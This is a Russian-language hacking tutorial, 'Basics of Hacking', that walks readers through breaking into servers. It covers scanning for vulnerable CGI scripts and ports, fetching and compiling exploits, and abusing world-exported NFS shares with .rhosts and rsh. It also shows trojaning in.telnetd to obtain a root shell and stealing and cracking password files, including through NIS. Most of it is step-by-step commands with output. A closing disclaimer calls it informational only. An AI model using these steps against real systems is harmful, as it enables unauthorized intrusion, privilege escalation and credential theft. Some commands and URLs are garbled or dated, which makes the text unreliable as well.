Основы Взлома

Последнее время я получаю много вопросов по поводу того с чего же всё таки начинать взлом сервера (сайта ,странички и т.д. ), мне просто надоело каждый раз отвечать на этот вопрос и я решил написать по этому поводу статью. Итак,приступим. Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно.Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr,его можно скачать с йх официального сайта wwwcc.f2s.com,еще правда есть сканер от груааы Void (wwwvoid.ru) -Но он немного уступает DCS по скорости сканирования. Ок,дальше,сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???,а дальше вам надо найти то как использовать этот эксплоит,я дам вам несколько ссылок где можжно найти описание этих ошибок: qwerty.nanko.ru (наиболее полный но на Английском) wwwvoid.ru wwwhack-crack.com или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска: wwwpacketstorm.securify.com wwwsecurityfocus.com wwwrootshell.com Второе и пожалуй главное-это сканирование портов,для сканирования можно использовать любой сканнер портов(какой-на ваш выбор-их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут wwwnscan.hypermart.net,этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней) После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём,делаеться это с помощью клиента TELNET который есть даже в Вынь95(98,2000),в командной строке TELNET вы пишете telnet>open wwwtarget.com и смотрите версию софта например WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. после того как вы посмотрели версию вы должны найти эксплоит под эту версию,идете опятьже на wwwsecurityfocus.com wwwpacketstorm.securify.com wwwtechnotronic.com и вводите в строке поиска название программы и его версию После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привисти к рабочему состоянию(как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд то и компилировать его надо под этими системами Если у вас нет установленного ЮНИКСА то вам в любом случае(если хотите чего нибудь ломать нужен Юникс Шелл-то есть оболочка Юникс) Бесплатно её можно получить на wwwnether.net и тому подобных серверах(введите на любом поисковике UNIX+SHELL+FREE) Когда шелл получем и эксплоит скачен то можно приступать к компилированию,обычно эксплоит(в большинстве случаев) это программа на языке С для компиляции будем использовать компилятор GCC итак в командной строке оболочки пишем gcc -o exploit exploit.c и нижимаем Enter хочу так же заметить что программы в Юникс подобный системах запускаються с "./"+имя программы, в нашем случае эксплоит будет запускаться >./exploit Третье-еще один довольно популярный взлом системы это проверка на расшаренные папки,в Юникс то можно проверить с помощью утилиты showmount итак из оболочки запускаем showmount >showmount -e wwwtarget.com и видим /user/ Everyone или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех дальше пишем >mount -t nfs target.remote.com:/user /mnt потом переходми в каталог cd /mnt/home и устанавливаем .rhosts >echo wwwtarget.com user/.rhosts дальше делаем следующее: >cat /etc/passwd user::257:20:: / : -(уберите пробелы между : / :)смотрим пользователя и создаем такогоже у нас(если возможно) > su - user ! Становимся им $ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! И заходим на удаленную машину % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! Каталог доступен на запись drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! Нашли программу, которая запустится !под root"ом из нашего каталога % cd /usr/etc % mv in.telnetd in.telnetd1 ! создаем троянского коня % cat in.telnetd >!/bin/sh exec /bin/csh -i % chmod 755 in.telnetd ! и запускаем его % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! > chown user /etc; ! Делаем /etc своим : command not found > exit; : command not found Connection closed by foreign host. > cd /etc после того как у нас есть файл с паролями вы берет расшифровщик паролей Юникс -John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе! И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера Из оболочки запускаем >rpcinfo -p wwwtarget.com | grep bind и если видим что=то типа 120000 2 udp 2493 ypbind то пробуем сдлать следующее >ypx -o target.passwd -g target.remote.com Берём файл с паролями и запускаем подборщик. На этом все!

Эта статья предназначена только для ознакомительных целей. Ни в коем случае не реализовывайте на практике то, что Вы прочитаете, так как Вы несете полную ответственность за свои поступки в соответствии с действующим законодательством. Я не отвечаю за достоверность информации и не несу ответственности за Ваши поступки!  Все что вы делаете, вы делаете на свой страх и риск!!!